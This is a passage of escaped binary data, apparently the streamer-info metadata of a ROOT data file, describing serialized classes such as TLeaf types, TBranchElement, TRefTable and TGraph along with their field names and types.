counter)\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TLeaf*\x00@\x00\x01\xcc\x80\x00\x00[@\x00\x01\xc4\x00\t@\x00\x00\x14\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x06TLeafD\x00\x11\x8e\x87v\x00\x00\x00\x01@\x00\x01\x9e\x80\x00\x00\x9b@\x00\x01\x96\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00{\x80\x00\x00\xc6@\x00\x00s\x00\x03@\x00\x00i\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05TLeaf\'Leaf: description of a Branch data type\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00m\x1e\x81R\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00}\x80\x00\x02\x08@\x00\x00u\x00\x02@\x00\x00o\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMinimum(Minimum value if leaf range is specified\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00}\x80\x00\x02\x08@\x00\x00u\x00\x02@\x00\x00o\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMaximum(Maximum value if leaf range is specified\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double\x00@\x00\x01\xca\x80\x00\x00[@\x00\x01\xc2\x00\t@\x00\x00\x14\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x06TLeafF\x00:\xdd\x9dr\x00\x00\x00\x01@\x00\x01\x9c\x80\x00\x00\x9b@\x00\x01\x94\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00{\x80\x00\x00\xc6@\x00\x00s\x00\x03@\x00\x00i\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05TLeaf\'Leaf: description of a Branch data type\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00m\x1e\x81R\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00|\x80\x00\x02\x08@\x00\x00t\x00\x02@\x00\x00n\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMinimum(Minimum value if leaf range is specified\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05float@\x00\x00|\x80\x00\x02\x08@\x00\x00t\x00\x02@\x00\x00n\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMaximum(Maximum value if leaf range is specified\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05float\x00@\x00\x01\xd0\x80\x00\x00[@\x00\x01\xc8\x00\t@\x00\x00\x14\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x06TLeafL\x00\xde2\x08b\x00\x00\x00\x01@\x00\x01\xa2\x80\x00\x00\x9b@\x00\x01\x9a\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00{\x80\x00\x00\xc6@\x00\x00s\x00\x03@\x00\x00i\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05TLeaf\'Leaf: description of a Branch data type\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00m\x1e\x81R\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00\x7f\x80\x00\x02\x08@\x00\x00w\x00\x02@\x00\x00q\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMinimum(Minimum value if leaf range is specified\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x7f\x80\x00\x02\x08@\x00\x00w\x00\x02@\x00\x00q\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMaximum(Maximum value if leaf range is specified\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t\x00@\x00\x01\xc8\x80\x00\x00[@\x00\x01\xc0\x00\t@\x00\x00\x14\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x06TLeafB\x00\x0f\x1eK^\x00\x00\x00\x01@\x00\x01\x9a\x80\x00\x00\x9b@\x00\x01\x92\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00{\x80\x00\x00\xc6@\x00\x00s\x00\x03@\x00\x00i\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05TLeaf\'Leaf: description of a Branch data type\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00m\x1e\x81R\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00{\x80\x00\x02\x08@\x00\x00s\x00\x02@\x00\x00m\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMinimum(Minimum value if leaf range is specified\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04char@\x00\x00{\x80\x00\x02\x08@\x00\x00s\x00\x02@\x00\x00m\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMaximum(Maximum value if leaf range is specified\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04char\x00@\x00\x01\xca\x80\x00\x00[@\x00\x01\xc2\x00\t@\x00\x00\x14\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x06TLeafS\x00\x15\x0c\xee\xcf\x00\x00\x00\x01@\x00\x01\x9c\x80\x00\x00\x9b@\x00\x01\x94\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00{\x80\x00\x00\xc6@\x00\x00s\x00\x03@\x00\x00i\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05TLeaf\'Leaf: description of a Branch data type\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00m\x1e\x81R\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00|\x80\x00\x02\x08@\x00\x00t\x00\x02@\x00\x00n\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMinimum(Minimum value if leaf range is specified\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00|\x80\x00\x02\x08@\x00\x00t\x00\x02@\x00\x00n\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMaximum(Maximum value if leaf range is specified\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short\x00@\x00\x01\xc8\x80\x00\x00[@\x00\x01\xc0\x00\t@\x00\x00\x14\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x06TLeafO\x00\x02\xaeH\xd3\x00\x00\x00\x01@\x00\x01\x9a\x80\x00\x00\x9b@\x00\x01\x92\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00{\x80\x00\x00\xc6@\x00\x00s\x00\x03@\x00\x00i\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05TLeaf\'Leaf: description of a Branch data type\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00m\x1e\x81R\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00{\x80\x00\x02\x08@\x00\x00s\x00\x02@\x00\x00m\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMinimum(Minimum value if leaf range is specified\x00\x00\x00\x12\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04bool@\x00\x00{\x80\x00\x02\x08@\x00\x00s\x00\x02@\x00\x00m\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMaximum(Maximum value if leaf range is specified\x00\x00\x00\x12\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04bool\x00@\x00\x05\xf1\x80\x00\x00[@\x00\x05\xe9\x00\t@\x00\x00\x1c\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x0eTBranchElement\x00\xe7O^c\x00\x00\x00\n@\x00\x05\xbb\x80\x00\x00\x9b@\x00\x05\xb3\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00@\x00\x00g\x80\x00\x00\xc6@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TBranch\x11Branch descriptor\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x97\x8a\xac\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\r@\x00\x00w\x80\x00\x01?@\x00\x00o\x00\x02@\x00\x00i\x00\x04@\x00\x007\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfClassName\x1fClass name of referenced object\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString@\x00\x00m\x80\x00\x01?@\x00\x00e\x00\x02@\x00\x00_\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfParentName\x14Name of parent class\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString@\x00\x00\x7f\x80\x00\x01?@\x00\x00w\x00\x02@\x00\x00q\x00\x04@\x00\x00?\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfClonesName&Name of class in TClonesArray (if any)\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString@\x00\x00m\x80\x00\x02\x08@\x00\x00e\x00\x02@\x00\x00_\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfCheckSum\x11CheckSum of class\x00\x00\x00\r\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0cunsigned int@\x00\x00p\x80\x00\x02\x08@\x00\x00h\x00\x02@\x00\x00b\x00\x04@\x00\x002\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\rfClassVersion\x17Version number of class\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00/\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03fID\x1eelement serial number in fInfo\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00Z\x80\x00\x02\x08@\x00\x00R\x00\x02@\x00\x00L\x00\x04@\x00\x00\x1e\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fType\x0bbranch type\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00/\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\rfStreamerType\x14branch streamer type\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\x86\x80\x00\x02\x08@\x00\x00~\x00\x02@\x00\x00x\x00\x04@\x00\x00J\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMaximum4Maximum entries for a TClonesArray or variable array\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\x87\x80\x00\x16\xcb@\x00\x00\x7f\x00\x02@\x00\x00y\x00\x04@\x00\x00?\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfBranchCount%pointer to primary branchcount branch\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0fTBranchElement*@\x00\x00\x8a\x80\x00\x16\xcb@\x00\x00\x82\x00\x02@\x00\x00|\x00\x04@\x00\x00B\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\rfBranchCount2\'pointer to secondary branchcount branch\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0fTBranchElement*\x00@\x00\x01\x9b\x80\x00\x00[@\x00\x01\x93\x00\t@\x00\x00\x1a\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x0cTLeafElement\x00\xa0O\x88\x93\x00\x00\x00\x01@\x00\x01g\x80\x00\x00\x9b@\x00\x01_\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00{\x80\x00\x00\xc6@\x00\x00s\x00\x03@\x00\x00i\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05TLeaf\'Leaf: description of a Branch data type\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00m\x1e\x81R\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00/\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03fID\x1eelement serial number in fInfo\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00X\x80\x00\x02\x08@\x00\x00P\x00\x02@\x00\x00J\x00\x04@\x00\x00\x1c\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fType\tleaf type\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int\x00@\x00\x01\xc6\x80\x00\x00[@\x00\x01\xbe\x00\t@\x00\x00\x14\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x06TLeafC\x00\xfb\xe3\xb2\xf3\x00\x00\x00\x01@\x00\x01\x98\x80\x00\x00\x9b@\x00\x01\x90\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00{\x80\x00\x00\xc6@\x00\x00s\x00\x03@\x00\x00i\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05TLeaf\'Leaf: description of a Branch data type\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00m\x1e\x81R\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00z\x80\x00\x02\x08@\x00\x00r\x00\x02@\x00\x00l\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMinimum(Minimum value if leaf range is specified\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00z\x80\x00\x02\x08@\x00\x00r\x00\x02@\x00\x00l\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMaximum(Maximum value if leaf range is specified\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int\x00@\x00\x010\x80\x00\x00[@\x00\x01(\x00\t@\x00\x00\x18\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\nTBranchRef\x00#`\xb3\xfd\x00\x00\x00\x01@\x00\x00\xfe\x80\x00\x00\x9b@\x00\x00\xf6\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00g\x80\x00\x00\xc6@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TBranch\x11Branch descriptor\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x97\x8a\xac\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\r@\x00\x00r\x80\x00\x16\xcb@\x00\x00j\x00\x02@\x00\x00d\x00\x04@\x00\x00/\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfRefTable\x18pointer to the TRefTable\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nTRefTable*\x00@\x00\x02\xdc\x80\x00\x00[@\x00\x02\xd4\x00\t@\x00\x00\x17\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\tTRefTable\x00\x8c\x89[\x85\x00\x00\x00\x03@\x00\x02\xab\x80\x00\x00\x9b@\x00\x02\xa3\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00@\x00\x00g\x80\x00\x00\xc6@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00o\x80\x00\x02\x08@\x00\x00g\x00\x02@\x00\x00a\x00\x04@\x00\x003\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fSize dummy for backward compatibility\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\xa2\x80\x00\x16\xcb@\x00\x00\x9a\x00\x02@\x00\x00\x94\x00\x04@\x00\x00_\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fParentsIarray of Parent objects (eg TTree branch) holding the referenced objects\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nTObjArray*@\x00\x00q\x80\x00\x16\xcb@\x00\x00i\x00\x02@\x00\x00c\x00\x04@\x00\x000\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fOwner\x1cObject owning this TRefTable\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08TObject*@\x00\x00\x91\x80\x00A\x08@\x00\x00\x89\x00\x03@\x00\x00{\x00\x04@\x00\x00B\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\rfProcessGUIDs\'UUIDs of TProcessIDs used in fParentIDs\x00\x00\x01\xf4\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0evector<string>\x00\x00\x00\x01\x00\x00\x00=\x00@\x00\x01\xb8\x80\x00\x00[@\x00\x01\xb0\x00\t@\x00\x00\x17\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\tTObjArray\x00\xa9\x9eeR\x00\x00\x00\x03@\x00\x01\x87\x80\x00\x00\x9b@\x00\x01\x7f\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00x\x80\x00\x00\xc6@\x00\x00p\x00\x03@\x00\x00f\x00\x04@\x00\x007\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0eTSeqCollection\x1bSequenceable collection ABC\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfcl;\xc6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x00@\x00\x00m\x80\x00\x02\x08@\x00\x00e\x00\x02@\x00\x00_\x00\x04@\x00\x001\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfLowerBound\x18Lower bound of the array\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00y\x80\x00\x02\x08@\x00\x00q\x00\x02@\x00\x00k\x00\x04@\x00\x00=\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fLast*Last element in array containing an object\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int\x00@\x00\x05\x90\x80\x00\x00[@\x00\x05\x88\x00\t@\x00\x00\x14\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x06TGraph\x00\x05\xf7\xf4e\x00\x00\x00\x04@\x00\x05b\x80\x00\x00\x9b@\x00\x05Z\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00@\x00\x00\x7f\x80\x00\x00\xc6@\x00\x00w\x00\x03@\x00\x00m\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06TNamed*The basis for a named object (name, title)\x00\x00\x00C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdf\xb7J<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00f\x80\x00\x00\xc6@\x00\x00^\x00\x03@\x00\x00T\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08TAttLine\x0fLine attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x94\x07EI\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00k\x80\x00\x00\xc6@\x00\x00c\x00\x03@\x00\x00Y\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08TAttFill\x14Fill area attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd9*\x92\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00j\x80\x00\x00\xc6@\x00\x00b\x00\x03@\x00\x00X\x00\x04@\x00\x00)\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nTAttMarker\x11Marker attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00)\x1d\x8b\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00n\x80\x00\x02\x08@\x00\x00f\x00\x02@\x00\x00`\x00\x04@\x00\x002\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fNpoints\x1cNumber of points <= fMaxSize\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\x80\x80\x00\x17\xd0@\x00\x00x\x00\x02@\x00\x00^\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fX\x1c[fNpoints] array of X 